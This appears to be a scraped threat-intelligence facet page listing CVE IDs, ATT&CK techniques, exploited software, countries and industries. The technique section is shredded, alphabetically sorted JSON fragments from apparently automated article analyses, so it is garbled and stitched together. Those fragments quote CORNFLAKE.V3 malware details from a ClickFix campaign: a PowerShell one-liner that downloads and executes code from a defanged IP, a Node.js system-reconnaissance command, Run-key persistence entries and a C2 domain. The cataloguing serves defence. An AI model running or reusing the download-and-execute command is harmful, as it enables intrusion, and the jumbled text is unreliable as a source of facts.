CVE-2025-40596 CVE-2025-40597 CVE-2025-40598 CVE-2025-41420 CVE-2025-42957 CVE-2025-42999 CVE-2025-4322 CVE-2025-43300 CVE-2025-4428 CVE-2025-46407 CVE-2025-46410 CVE-2025-46411 CVE-2025-47152 CVE-2025-47227 CVE-2025-47228 CVE-2025-47984 CVE-2025-48005 CVE-2025-48530 CVE-2025-48539 CVE-2025-48543 CVE-2025-48732 CVE-2025-48757 CVE-2025-48807 CVE-2025-49704 CVE-2025-49706 CVE-2025-49707 CVE-2025-49712 CVE-2025-49743 CVE-2025-50128 CVE-2025-50129 CVE-2025-50165 CVE-2025-50167 CVE-2025-50168 CVE-2025-50171 CVE-2025-50176 CVE-2025-50177 CVE-2025-5086 CVE-2025-52456 CVE-2025-52461 CVE-2025-52543 CVE-2025-52544 CVE-2025-52545 CVE-2025-52546 CVE-2025-52547 CVE-2025-52548 CVE-2025-52549 CVE-2025-52550 CVE-2025-52551 CVE-2025-52581 CVE-2025-52930 CVE-2025-53084 CVE-2025-53085 CVE-2025-53109 CVE-2025-53132 CVE-2025-53147 CVE-2025-53156 CVE-2025-53399 CVE-2025-53510 CVE-2025-53511 CVE-2025-53518 CVE-2025-53557 CVE-2025-53652 CVE-2025-53690 CVE-2025-53731 CVE-2025-53733 CVE-2025-53740 CVE-2025-53766 CVE-2025-53767 CVE-2025-53770 CVE-2025-53771 CVE-2025-53773 CVE-2025-53774 CVE-2025-53778 CVE-2025-53779 CVE-2025-53781 CVE-2025-53784 CVE-2025-53786 CVE-2025-53787 CVE-2025-53792 CVE-2025-53793 CVE-2025-53853 CVE-2025-5394 CVE-2025-54132 CVE-2025-54136 CVE-2025-54462 CVE-2025-54480 CVE-2025-54939 CVE-2025-54948 CVE-2025-54987 CVE-2025-55177 CVE-2025-55190 CVE-2025-55284 CVE-2025-55305 CVE-2025-57788 CVE-2025-57789 CVE-2025-57790 CVE-2025-57791 CVE-2025-6204 CVE-2025-6218 CVE-2025-6519 CVE-2025-7771 CVE-2025-7775 CVE-2025-7776 CVE-2025-8088 CVE-2025-8424 CVE-2025-8875 CVE-2025-8876 CVE-2025-9132 CVE-2025-9363 CVE-2025-9377 CVE-2025-9478 CVE-XXXX-Citrix_NetScaler_zero-day
MITRE ATT&CK TTP All "# Download the Node.js zip file.\niwr -Uri $ZipURL -OutFile $ZipFile" ] "As seen in the Figure 2 "C:\\Users\\<User>\\AppData\\Roaming\\php\\config.cfg CORNFLAKE.V3 (PHP) sample" "C:\\Users\\<User>\\AppData\\Roaming\\Shift194340\\78G0ZrQi.png WINDYTWIST.SEA backdoor sample dropped by CORNFLAKE.V3 (PHP)" ] "Cloud Accounts: T1078.004 "Command and Scripting Interpreter: T1059 "Content Injection: T1659 "context": "" "context": "Attackers are gaining high value credentials through vishing (a form of social engineering) which enables them to use valid accounts." "context": "The article mentions a cyber incident and access to JLR's systems "context": "The article mentions access to JLR's IT systems "context": "The article mentions that it is unconfirmed whether ransomware was installed "context": "The attackers used Telegram "context": "The CORNFLAKE.V3 payload is Base64 encoded within the PowerShell dropper script "context": "The initial compromise occurs through ClickFix lure pages "context": "The initial infection chain starts with a PowerShell command executed through the Windows Run dialog. This PowerShell script downloads and executes further payloads." "context": "The malware creates and uses specific files and directories within the victim's file system "context": "The malware establishes persistence by creating registry Run keys "context": "The malware executes a series of commands to gather system information "context": "The malware modifies the Registry to achieve both initial execution via the RunMRU key and persistence via the Run key." "context": "The malware uses batch scripts containing reconnaissance commands "context": "The malware uses Cloudflare Tunnels to proxy traffic to its C2 server "context": "The malware uses PowerShell to download additional tools and payloads "context": "The text mentions social engineering as a method of entry "contradictions": "" } "contradictions": "No mention of services like VPNs "contradictions": "None" } "contradictions": "The article does not specify other application layer protocols used for command and control "contradictions": "The article doesn't provide evidence of any specific exploited application." } "contradictions": "The article mentions the unobfuscated nature of the script "contradictions": "The article states it is UNCONFIRMED "contradictions": "The language is vague "contradictions": "The specific methods for leveraging the accounts post-compromise are not detailed in the article." } "Credentials from Password Stores: T1555 "Data Encrypted for Impact: T1486 "Deobfuscate/Decode Files or Information: T1140 "Drive-by Compromise: T1189 "Email Forwarding Rule: T1114.003 "Exploit Public-Facing Application: T1190 "Exploitation for Client Execution: T1203 "Exploitation for Privilege Escalation: T1068 "Exploitation of Remote Services: T1210 "External Remote Services: T1133 "File and Directory Discovery: T1083 "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\iCube Scheduled task that executes the CORNFLAKE.V3 (PHP) sample" ] "Impair Defenses: T1562 "independent_analysis": "" "independent_analysis": "Compromising valid accounts is a common goal in many attacks "independent_analysis": "Telegram is an application layer protocol used for communication. Sharing screenshots through it indicates usage of this protocol for exfiltration or demonstration of access." "independent_analysis": "The absence of confirmation about ransomware means there's no verifiable instance of data encryption. It remains a possibility "independent_analysis": "The act of tricking a user into copying and pasting a malicious script into the Windows Run dialog is client side exploitation since it relies on the user to execute the command." "independent_analysis": "The entries 'ChromeUpdater' and 'iCube' under the Run key will trigger execution of the associated malware when the user logs in. This is a clear example of abusing the scheduled task/job mechanism for persistence." "independent_analysis": "The execution of `systeminfo` "independent_analysis": "The execution of PowerShell with the `-c` parameter to execute a command directly "independent_analysis": "The explicit mention of registry keys being modified "independent_analysis": "The lack of detail about the vulnerability used makes it impossible to confirm this technique. Other access vectors are possible." "independent_analysis": "The listing of specific file paths indicates that the malware actively discovers and/or uses file system locations to store malicious components. This falls under file and directory discovery "independent_analysis": "The provided quotes lack the specific details (e.g. links, attachments, impersonation, etc.) needed to verify phishing as a method used. No other evidence exists to suggest its inclusion" "independent_analysis": "The use of `irm` (Invoke-WebRequest alias) and `iwr` to download files from remote servers clearly indicates Ingress Tool Transfer. This is used to retrieve the necessary tools (Node.js, PHP interpreter) and the malware itself (CORNFLAKE.V3 variants and WINDYTWIST.SEA backdoor)." "independent_analysis": "The use of Base64 encoding represents a form of obfuscation. While not particularly sophisticated "independent_analysis": "The use of batch scripts for reconnaissance implies the use of the Windows Command Shell for executing these scripts. These batch scripts are explicitly used to collect domain information. The specific commands executed are indicative of reconnaissance activities." "independent_analysis": "The use of Cloudflare tunnels acts as a proxy "independent_analysis": "Without details on how the initial access was gained "Indicator Removal: T1070 "Ingress Tool Transfer: T1105 "Inhibit System Recovery: T1490 "Input Capture: T1056 "Lateral Tool Transfer: T1570 "Native API: T1106 "Non-Application Layer Protocol: T1095 "Obfuscated Files or Information: T1027 "OS Credential Dumping: T1003 "Phishing: T1566 "powershell -w h -c \"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex\"" ] "PowerShell: T1059.001 "Process Injection: T1055 "Proxy: T1090 "Registry: T1112 "Remote Services: T1021 "Replication Through Removable Media: T1091 "Service Stop: T1489 "Spearphishing Attachment: T1193 "Spearphishing Link: T1192 "Supply Chain Compromise: T1195 "System Information Discovery: T1082 "The atst function "The threat actors have clearly come together to improve the effectiveness of establishing initial access to victims "Trusted Relationship: T1199 "Unsecured Credentials: T1552 "Valid Accounts: T1078 "varying-rentals-calgary-predict.trycloudflare[.]com CORNFLAKE.V3 (PHP) C2 server associated with UNC5774" ] "Windows Command Shell: T1059.003 "Windows Management Instrumentation: T1047 `Get-PSDrive` `Get-Service` `tasklist /svc` an application layer protocol and `arp -a` directly corresponds to the technique of System Information Discovery. The malware is actively gathering details about the system to potentially aid in further exploitation or lateral movement." and doesn't provide enough information to be certain of Phishing TTP." } and the ARP table." and the use of `irm` (Invoke-WebRequest alias) to download and execute code API: T1106 Application Layer Protocol: T1071 are clear indicators of PowerShell being used as an execution vector." as it allows threat actors to blend in with legitimate activity." as these locations are critical to the malware's operation." attempts to establish persistence on the host by creating a new registry Run key named ChromeUpdater under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run ." ] available drives but it doesn't specify whether a public-facing application was exploited." but lacks supporting evidence." but not specifically if this was through an external remote service." called by main Cloud Accounts: T1078.004 Code Injection: T1505.002 Command and Scripting Interpreter: PowerShell: T1059.001 Command and Scripting Interpreter: T1059 Command and Scripting Interpreter: T1059.003 Compromise: T1190 Compromise: T1195 Compromised Credentials: T1552 containing the following entry which resulted in the download and execution of the next payload:" Content Injection: T1659 Credentials from Password Stores: T1555 Data Encrypted for Impact: T1486 Defacement: T1659 Deobfuscate/Decode Files or Information: T1140 directly maps to the Modify Registry technique. This involves adding/modifying values in these keys to achieve a specific objective." DNS Management: T1659 Drive-by Compromise: T1189 Email Forwarding Rule: T1114.003 executed via cmd.exe Exploit Public-Facing Application: T1190 Exploitation for Client Execution: T1203 Exploitation for Privilege Escalation: T1068 Exploitation of Remote Services: T1210 External Remote Services: T1133 File and Directory Discovery: T1083 however Impair Defenses: T1562 implying this cannot be used as evidence." } including the CORNFLAKE.V3 variants and the WINDYTWIST.SEA backdoor." including the Node.js runtime and the CORNFLAKE.V3 sample itself." including user privilege level Indicator Removal: T1070 Ingress Tool Transfer: T1105 Inhibit System Recovery: T1490 Input Capture: T1056 it serves to hide the content of the payload from casual inspection." known as ClickFix Lateral Tool Transfer: T1570 likely to obfuscate the true location of the C2 infrastructure and evade detection." lures website visitors into executing a downloader script which initiates a malware infection chain." masking the real destination server. The trycloudflare[.]com domain indicates the use of Cloudflare's tunneling service." Modify Registry: T1112 Native API: T1106 Non-Application Layer Protocol: T1095 Obfuscated Files or Information: T1027 only for sharing the screenshots." } or other remote access tools." } OS Credential Dumping: T1003 particularly within the AppData directory Path Traversal: T1570 Phishing: T1566 PowerShell: T1059.001 Privilege Escalation: T1068 Process Injection: T1055 Proxy: T1090 quotes": [ "$BASE64STRING =<Base-64 encoded CORNFLAKE.V3 sample>\n# Decode the Base64 string.\n$BINARYDATA = [Convert]::FromBase64String($BASE64STRING)" ] quotes": [ "All three groups are known for their use of social engineering techniques to gain entry into targets" ] quotes": [ "C:\\Users\\<User>\\AppData\\Roaming\\node-v22.11.0-win-x64\\ckw8ua56.log Copy of the CORNFLAKE.V3 (Node.js) sample used for persistence" quotes": [ "CORNFLAKE.V3 has also been observed abusing Cloudflare Tunnels to proxy traffic to remote servers." quotes": [ "Evidence of this activity was found in the HKEY_USERS\\User\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU registry key quotes": [ "Following this quotes": [ "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ChromeUpdater Scheduled task that executes the CORNFLAKE.V3 (Node.js) sample" quotes": [ "However quotes": [ "irm 138.199.161[.]141:8080/$u|iex" quotes": [ "It has not been confirmed whether any data has been stolen or if Scattered Lapsus$ Hunters installed ransomware." ] quotes": [ "Mandiant observed that a PowerShell script was executed via the Run command using the Windows+R shortcut." quotes": [ "Recently quotes": [ "The first payload observed on the host was a batch script containing reconnaissance commands." ] quotes": [ "This deceptive technique quotes": [] RDP Remote Code Execution: T1210 Remote Services: T1021 Replication Through Removable Media: T1091 running tasks/services Scattered Spider and ShinyHunters have used vishing techniques to gain high value credentials in third-party IT providers." ] Scheduled Task/Job: T1053 Screen Capture: T1113 service details Service Stop: T1489 so there is no direct evidence of data being encrypted for impact." Spearphishing Attachment: T1193 Spearphishing Link: T1192 specifically RunMRU for initial execution and Run for persistence Supply Chain Compromise: T1195 system information System Information Discovery: T1082 the group shared screenshots reportedly taken from inside JLR’s IT networks on the messaging app Telegram." ] the malware attempts to collect system information using the following code: let cmd = execSync('chcp 65001 > $null 2>&1 ; echo \'version: ' + ver + '\' ; if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { \'Runas: System\' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { \'Runas: Admin\' } else { \'Runas: User\' } ; systeminfo ; echo \'=-=-=-=-=-\' ; tasklist /svc ; echo \'=-=-=-=-=-\' ; Get-Service | Select-Object -Property Name, DisplayName | Format-List ; echo \'=-=-=-=-=-\' ; Get-PSDrive -PSProvider FileSystem | Format-Table -AutoSize ; echo \'=-=-=-=-=-\' ; arp -a', { encoding: 'utf-8', shell: 'powershell.exe', windowsHide: true });" ] the use of base64 is technically obfuscation" } the user was lured into pasting a hidden script into the Windows Run dialog box which was automatically copied to the clipboard by the malicious web page when the user clicked on the image." ] to gather information about the system and the Active Directory environment." to share screenshots of internal JLR systems." to store and execute its components Trusted Relationship: T1199 ttp": { "items": { "Application Layer Protocol: T1071 ttp": { "items": { "Impair Defenses: T1562 ttp": { "items": { "Scheduled Task/Job: T1053 Unsecured Credentials: T1552 Valid Accounts: T1078 we cannot infer whether an external remote service was involved." where users are tricked into copying and pasting a malicious PowerShell script into the Windows Run dialog box." which *could* include Phishing. No specific details are provided. Furthermore which are used to automatically execute the CORNFLAKE.V3 samples upon user logon." which is not specific enough to link to Phishing." which necessitates decoding before execution." Windows Command Shell: T1059.003 Windows Management Instrumentation: T1047 with the group collaborating on techniques and the data they have available to enhance their attacks"
Exploited Software All .edu Domains @nx @nx/devkit @nx/enterprise-cloud @nx/eslint @nx/js @nx/key @nx/node @nx/workspace 1Password 5G 5G Network Active Directory Adobe Commerce (Magento) AES-128 Agentic AI AI Agents AI Models (OpenAI, xAI) Airtel Zerotouch router Alone theme Amazon accounts Amazon ECS Amazon Q Developer Amazon Q Developer VS Code extension Amazon Q Developer VS Code Extension Amazon Q Developer VS Code Extension (Amazon Q) AMD Zen 2 CPUs Amp Amp Code amsdk.sys (WatchDog Antimalware driver) Android Android Applications Android Apps Android Devices Android Kernel Android Runtime Android Runtime (ART) Android Runtime Environment Android System Android System component Android VPN Apps (Group A) Android VPN Apps (Group B) Android VPN Apps (Group C) Anthropic Claude 4 Sonnet Anthropic Filesystem MCP Server Anthropic's Filesystem MCP Server Anthropic’s MCP Inspector Anthropic's Slack MCP Server AnyDesk Apache Apache ActiveMQ Apache Tomcat Apple Advanced Protection Program Apple ID Apple Image I/O framework Apple iOS Apple iPadOS Apple macOS Argo CD ASP.NET ASP.NET ViewState AsyncRAT Atera Atomic macOS Stealer (AMOS) Auth0 AWS Certificate Manager AWS Kiro AWS Trusted Advisor Bachtrack server Backup Systems BadBazaar BadBox botnet BadPotato BadPotato and EfsPotato banking/government apps Base44 bcmbipdll.dll BIG-IP Bitbucket BitChat Bitdefender Bl00dy ransomware Black Basta BlackSuit ransomware BlotchyQuasar Box Broadcom BCM5820X Broadcom's implementation of the adapters required to interface with the Windows Biometric Framework (WBF) Bybit's compromised supply chain C programming language C# Random Caesars Entertainment California State Water Board website CANONSTAGER CapCut Carmaker's Online Dealership Portal Case Management/Electronic Case Files (CM/ECF) CastleLoader CastleRAT Cellular Modems (Multiple Vendors) Change Healthcare Chaos ransomware Chase Bank ChatGPT ChatGPT app ChatGPT Codex ChatGPT Connectors ChatGPT's Agent mode Chrome CI/CD Pipelines Cisco Cisco Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC) Cisco IOS Cisco IOS and Cisco IOS XE Cisco IOS and Cisco IOS XE software Cisco IOS and IOS XE Software Cisco IOS and IOS XE software (CVE-2018-0171) Cisco IOS Smart Install Cisco IOS Software Smart Install Feature Cisco Networking Devices Cisco Secure Firewall Management Center (FMC) Cisco Secure Firewall Management Center Software Cisco Smart Install (SMI) Citrix NetScaler Citrix NetScaler ADC and Gateway City of Dallas servers Claude Claude (Anthropic) Claude AI Chatbot Claude Code Claude Code AI tool Claude Sonnet 3.7 CleanMyMac CLEO MFT platforms (Harmony, VLTrader, Lexicom) ClickFix Cline cloud solution providers Cobalt Strike Colt Online Colt Technology Services (Potentially via CVE-2025-53770) Commvault Commvault Web Server Commvault's backup platform Commvault's QCommands Comodo Dragon Compromised Systems ConnectWise ContagiousDrop applications Conti ControlVault Windows APIs Copeland E2 controllers Copeland E3 controllers CORNFLAKE.V3 CosMc's Promotional Membership Coupon Criteo OneTag Shared Storage API worklet (https://fledge.criteo.com/interest-group/abt/worklet) Cryptocurrency mining software curl.exe Cursor Cursor IDE Cylance Danabot Dassault DELMIA Apriso DcRAT Deep Research Agents Dell ControlVault3 Dell ControlVault3 Firmware Dell ControlVault3 Plus Devin AI Digital Video Recorders Digital Video Recorders (DVRs) and WiFi routers DNS Management dnscat2 dnspot Domain Admin Accounts Domain User Accounts DoorDash Drift Dropbox Eclipse ThreadX FileX Eclipse ThreadX FileX 8.5 Eclipse ThreadX FileX git commit 1b85eb2 EfsPotato Elastic Defend EDR Elasticsearch Electron-based applications Entra ID Envoy ERMAC Android Banking Trojan ESET eslint-config-prettier eslint-plugin-prettier F-Secure Facebook Facewatch Facial Recognition Technology (FRT) systems Family A VPN Apps (Innovative Connecting, Autumn Breeze, Lemon Clove) Family B VPN Apps (Global VPN, XY VPN, Super Z VPN) Family C VPN Apps (Fast Potato VPN, X-VPN) file:///home/oai/redirect.html find Firefox Flask web application FortiClient Endpoint Management Server Fortinet Fortinet Network Management Tool Fortinet SSL VPNs Foxit PDF Reader Foxit Reader Fraudulent cryptocurrency apps FreePBX FreeVPN.One FreeVPN.One Chrome extension FScan Gemini Gemini CLI Gemini's API Gemini's API via the llm CLI Gemini's web interface Genspark Git Repositories GitHub GitHub Copilot GitHub Copilot Agent GitLab GiveWP WordPress donation plugin Gmail Google accounts Google Android (Qualcomm vulnerabilities) Google Assistant on an Android phone Google Chrome Google Gemini CLI Google Jules Google Pixel 7 Google Workspace Google's Agent Development Kit (ADK) Google’s Gemini 2.5 Pro Google's gemini-cli GPS Receivers GPT-4o GPT-5 Gravity Forms Plugin Great Firewall of China (GFW) Grindr Grok-4 gzip HAProxy HitManPro Hotel Booking Systems HRSword HTTP/1.1 HTTP/1.1 Server Implementations HTTPS Huawei equipment Huawei P40 Pro IAM Systems (Okta, Azure AD, Internal Authentication Services) IBM WebSphere iCloud Calendar iiNet order management system iiNet's order creation and tracking system Image I/O Framework Image I/O Framework (iOS/macOS) ImageIO Inotiv Systems and Data Inotiv's internal systems and data Intel CPUs Internet Explorer Internet Information Services (IIS) Internet of Things (IoT) computers and devices internet-facing appliances, including small office/home office devices Intradev's systems Iodine iOS IoT devices, routers, servers, and PCs iPadOS Israeli Live News website Ivanti Connect Secure and Policy Secure Ivanti Endpoint Manager Mobile (EPMM) j.js JAMF Java codebases Java program Jenkins Jenkins Git Parameter Plugin Jetty Jira JPEG2000 JPush JuicyPotato Jules Kaseya Kaspersky KaWaLocker ransomware ksmbd LameHug malware Lampion language server Large Language Models (LLMs) LastPass Latrodectus Ledger Nano S Plus Ledger Nano X Legacy devices in healthcare Legal Aid Agency Systems Lenovo 510 FHD and Lenovo Performance FHD webcams Libbiosig LimeRAT Linear Linksys RE-series models Linux kernel Linux Kernel Linux Kernel AF_VSOCK sockets Linux Kernel CVE-2024-50264 Linux kernel time subsystem LiteSpeed Web Server Llama-3-70b-instruct LLMs (Large Language Models) LockBit LockBit Black ransomware LockBit Windows encryptor Lovable LSQUIC Lumma Stealer LummaC2 LummaStealer M365 Copilot macOS macOS Sequoia macOS Sonoma macOS Ventura Mailchimp Make.com Manpower's network Manus Marks & Spencer Matanbuchus Loader MaterialX McAfee McDonald's Feel-Good Design Hub McDonald's Global Restaurant Standards portal McDonald's online delivery app McDonald's Staff Portals mcp-remote MedDream PACS Premium Mercedes-Benz (NTG6) Meta's Llama-3-8b-instruct MGM Resorts MGM World Microsoft Microsoft 365 Microsoft 365 accounts Microsoft 365 Copilot Microsoft Accounts Microsoft Applications via Entra OAuth Microsoft Azure cloud environment Microsoft cloud solution provider Microsoft Edge Microsoft Exchange Microsoft Exchange Server Microsoft Graphics Component Microsoft Installer (MSI) Microsoft Office Equation Editor Microsoft Quick Assist Microsoft SharePoint Microsoft SharePoint Server Microsoft software Microsoft Source Code Microsoft Teams Microsoft Windows Microsoft Word Microsoft's GitHub Copilot Mimikatz MintsLoader Mirai Mistral's Mistral-7b-instruct-v0.2 Mobile Devices Model Context Protocol (MCP) Motors theme MOVEit Transfer N-able N-central National Public Data Database NDI (Network Device Interface) Nefilim Ransomware Netflix and Paypal NetScaler ADC and NetScaler Gateway NetSupport Netty NetWalker network-attached storage (NAS) devices Nexar dashcams ngcp-rtpengine software NGINX Node.js Nomani Trojan npm NVIDIA Triton Inference Server Nvidia's H20 accelerators Nx Nx build system package Ollama Ollama Desktop On-premise Active Directory (AD) OnePlus Nord CE 2 Open source intelligence tools OpenAI Operator OpenAI’s “safe URL” rendering feature OpenAI's ChatGPT (open weight version) OpenAI's GPT Store OpenAI’s GPT-5 Fast OpenEXR OpenHands OpenLiteSpeed OpenSSH OpenSynergy Blue SDK Opera Browser Orange Belgium IT Systems Orange Group IT Systems Outdated software PACER Paradox.ai's Olivia Chatbot Passwordstate PayPal PDF-XChange Editor Perplexity's AI-powered browser Comet Phoenix Cryptolocker PHP Plex PowerSchool PowerShell PromptLock PsExec Pudu Robotics Backend Software PuTTY PyPI Python web server Python's TarFile.extractall() and TarFile.extract() Qilin ransomware Qualcomm Adreno GPUs Quantum ransomware RansomHub RDP RDP Wrapper RealBlindingEDR Redline/Meta Stealer Rejetto HTTP File Server (HFS) REMCOS RAT Remote Desktop Protocol Remote Desktop Protocol (RDP) ReVault Roblox Royal ransomware Ruby Marshal Deserialization Ruby Marshal Module Ruby on Rails RubyGems.org rundll32.exe Ryuk SaaS Accounts Safari SAIL Image Decoding Library Salesforce Salesloft Drift Samsung Galaxy S22 SAP NetWeaver SAP NetWeaver AS Java Visual Composer SAP S/4HANA Scalable Vector Graphics (SVG) School District Five of Lexington & Richland Counties' Computer Network ScriptCase SectopRAT SentinelOne SHA-1 Shadowsocks SharePoint SharePoint Servers Signal SIKE Simple Network Management Protocol (SNMP) SimpleHelp Sitecore Sitecore Active Directory 1.4 and earlier Sitecore Experience Manager (XM) and Sitecore Experience Platform (XP) Sitecore Experience Manager (XM), Experience Platform (XP), Experience Commerce (XC), and Managed Cloud Sitecore Experience Platform Sitecore XP 9.0 and Active Directory 1.4 and earlier versions Sitecore XP 9.0 and earlier Skoda Superb (MIB3) Slack Sliver Smartphone SMS payments, banking trojans and spyware Social Media Management Systems SoftEther SoftEther VPN SoftEther VPN client SoftEther VPN Client SOGU.SEC solana-pump-test solana-spl-sdk SolarWinds SonicOS SonicWall Gen 7 Firewalls SonicWall SMA100 series devices Sophos products South Korean software products South Korean Software Products SpectreJS Splashtop Sponsorship Management System (SMS) SQL SQL Injection Vulnerability SQLite SQLite FTS5 extension SSH sshd (OpenSSH server) SSL VPN ssp_dump_lsass STATICPLUGIN Symantec synckit SynologyPhotos Systems tar-fs TeaOnHer Telegram Telegraph Tenda AC6 Tenda AC6 Router Tenda AC6 V5.0 V02.03.01.110 The Biosig Project libbiosig The Co-op TheTruthSpy Third-Party Applications Third-party signed legitimate driver AToolsKrnl64.sys Third-party Software Package ThrottleStop.sys driver Thunderbird TightVNC TikTok Tizen OS tj-actions/changed-files GitHub Action Tor Browser TP-Link Archer C7 TP-Link Archer C7(EU) V2 and TL-WR841N/ND(MS) V9 (CVE-2025-9377) TP-Link Routers (CVE-2023-50224) TP-Link TL-WR841N/ND Trend Micro Trend Micro Apex One Tuya Smart Life App Twilio U.S. telecommunications infrastructure UE (User Equipment) Unpatched Servers USB drive VBScript VEED's Gen-AI Studio Vertex AI Studio Vertex AI with a Gemini back end Visual Studio Code VMware ESXi Volkswagen ID.4 (infotainment system: MEB ICAS3) Voting machines VPN Accounts VS Code VS Code Server Vulnerable Windows Drivers wamsdk.sys (Patched WatchDog Antimalware driver) WarmCookie Web Applications Web shells Webroot Websites (Yemen Ministry of Foreign Affairs, Yemen Ministry of Security Media and Israeli Live News) Websites affiliated with the Bharatiya Janata Party (BJP) Websites using HTTP protocol Websites using predictable session IDs Websites vulnerable to Cross-site request forgery (CSRF/XSRF) Websites vulnerable to Cross-site scripting (XSS) WhatsApp WhatsApp Business for iOS WhatsApp for iOS WhatsApp for Mac Wi-Fi Routers Windows Windows 10 Windows 11 Windows 2000 Windows CLFS Windows GDI+ Windows Kerberos Windows Message Queuing Windows NTLM Windows OS Windows Run dialog box or PowerShell terminal Windows Servers Windows Win32K - GRFX Windows-based workstations and servers Windsurf Windsurf Cascade Windsurf MCP Integration WINDYTWIST.SEA WinRAR WordPress Workday Workday's third-party CRM platform WWBN AVideo X2anylock (aka Warlock) ransomware xcopy.exe XenoRAT Xworm XWorm XZ-Utils Yemen Ministry of Foreign Affairs website Yemen Ministry of Security Media website YouTube YubiKey Zelle Zoom ZSAService.exe ZSATrayHelper.dll ZSATrayManager.exe ZSATunnel.exe Zscaler Client Connector
Involved Countries All Afghanistan Africa Albania Angola Argentina Australia Azerbaijan Bangladesh Belarus Belgium Brazil Britain Bulgaria California Canada Chile China Colombia Côte d’Ivoire countries Czech Republic Debian Ecuador Egypt England EU Europe European Union Fedora France Germany Ghana Hong Kong India Indonesia Iran Iraq Ireland Israel Italy Japan Kazakhstan Kenya Latin America Lithuania Luxembourg Malaysia Mali Maryland Mexico Moldova Mongolia Morocco Myanmar Netherlands Nevada New York New Zealand North America North Korea Norway OpenSUSE Pakistan Panama People's Republic of China (PRC) Peru Philippines Poland Portugal Qatar Red Hat Romania Russia Russian Federation Seychelles Singapore South Africa South Korea Spain Sweden Switzerland Taiwan Thailand Turkey U.S. UAE UK Ukraine United Arab Emirates United Kingdom United States United States of America Unspecified Countries US USA Vietnam Wales Yemen Zambia
Affected Industries All Academia Academic Research Adult Entertainment Advertising Advertising Technology Advertising/Marketing AI Airlines Animation Archiving Artificial Intelligence Artificial Intelligence (AI) Automotive Aviation Background Checking Services Backup Software Banking Banking and Finance Biotech Biotech & Pharmaceuticals Business Associations Business Council Businesses Classical Music and Dance Events Cloud Computing Cloud Platforms Cloud Security Cloud Services Cloud Storage Cloud WAF and WAF On-Prem Providers Cold Storage commercial facilities Communication Computing Infrastructure Construction Consulting Consumer Electronics Consumer Electronics (IoT Devices) Consumer Goods & Services Consumer Tech Consumer Technology Content Creation Contract Research Organization (CRO) Corporate Cybersecurity corporate network Corrections Credit Monitoring/Identity Theft Protection Credit Reporting Credit Unions Criminal Record Check Services Critical Infrastructure critical manufacturing Cryptocurrency Cryptocurrency Exchanges Customer Relationship Management (CRM) Cyber Insurance Cyber Security Cybersecurity Data Brokerage Data Centers Data Processing Decentralized Finance (DeFi) Defense Defense Industrial Base Defense Industrial Base (DIB) Delivery Services Digital Advertising Technology Digital Content Creation Digital Marketing Diplomatic E-bike E-commerce Education Election Technology Elections Electronics Manufacturing Embedded Systems Emergency Services Energy Energy (specifically Pipelines) Enterprise Resource Planning (ERP) Enterprise Resource Planning (ERP) Software Enterprise search and security Enterprise Software Entertainment Faith-Based Organizations Finance Financial Financial Institutions Financial Services Financial Technology (FinTech) / Cryptocurrency Exchanges Food & Beverage Food and Drink Food Service Food Services Footwear Gambling Gaming Government Government (Federal Civilian Executive Branch) Government (SLTT) Government agencies government facilities Government Services Hardware & Semiconductors Hardware Providers Hardware Wallet Manufacturing Health Care Health Insurance Health Technology healthcare Healthcare Higher Education Home Networking Hospitality Human Resources Information Technology Information Technology (IT) Insurance Intelligence Agencies Internet of Things (IoT) Internet Service Provider Internet Service Provider (ISP) Internet Service Providers (ISPs) Investment and Analytics IT IT and Security IT Security IT Service Providers IT Services Jewelry Retail Jewelry, gem, watch, and precious metal wholesale Journalism Law Enforcement Law Enforcement/Justice Legal Logistics Luxury Goods Managed Service Provider (MSP) Managed Service Providers (MSPs) Managed Services Providers (MSPs) Manufacturing Maritime Media Media and Broadcasting Media and Entertainment Medical Devices Messaging Military Military/Defense Mining Mobile App Development Mobile Application Mobile Device Industry Mobile Device Manufacturing Mobile Security Museums Networking News and Media News Publishing NFT Marketplace Non-Governmental Organizations Nuclear Nuclear Power Online Advertising Online Gaming Open-Source Software Organizations holding sponsor licenses Parks and Recreation Payday Loan Providers Payment Processing Personal Information Management Pharmaceutical Pharmaceuticals Postal Service Power Management Professional Services Professional, Scientific, and Technical Services Public Administration Public Safety Public Sector Religious Institutions Religious Organizations Research Research and Education Restaurant Retail Robotics SaaS Science News Scientific Research Security Security Industry Security Operations Security Software Semiconductor Semiconductor Manufacturing Semiconductors Shipbuilding Smart Home Technology Social Media Software Software Development Software Engineering Software Providers Software-as-a-Service (SaaS) Space Communications Sports Broadcasting Staffing Streaming Services Technologies Technology Technology (Storage Device Manufacturing) Technology Manufacturing Telcos and Media Telecommunications Ticketing Toy Manufacturing Trading Companies Transport Transportation Travel Utilities Vacation Rentals Video Streaming Platforms Visual Effects VPN VPN (Virtual Private Network) Water Systems Wealth Management Web Application Hosting Web Hosting Web Hosting/Cloud Services Web Infrastructure Web infrastructure and security Web Security Web Services Web-Hosting Website Hosting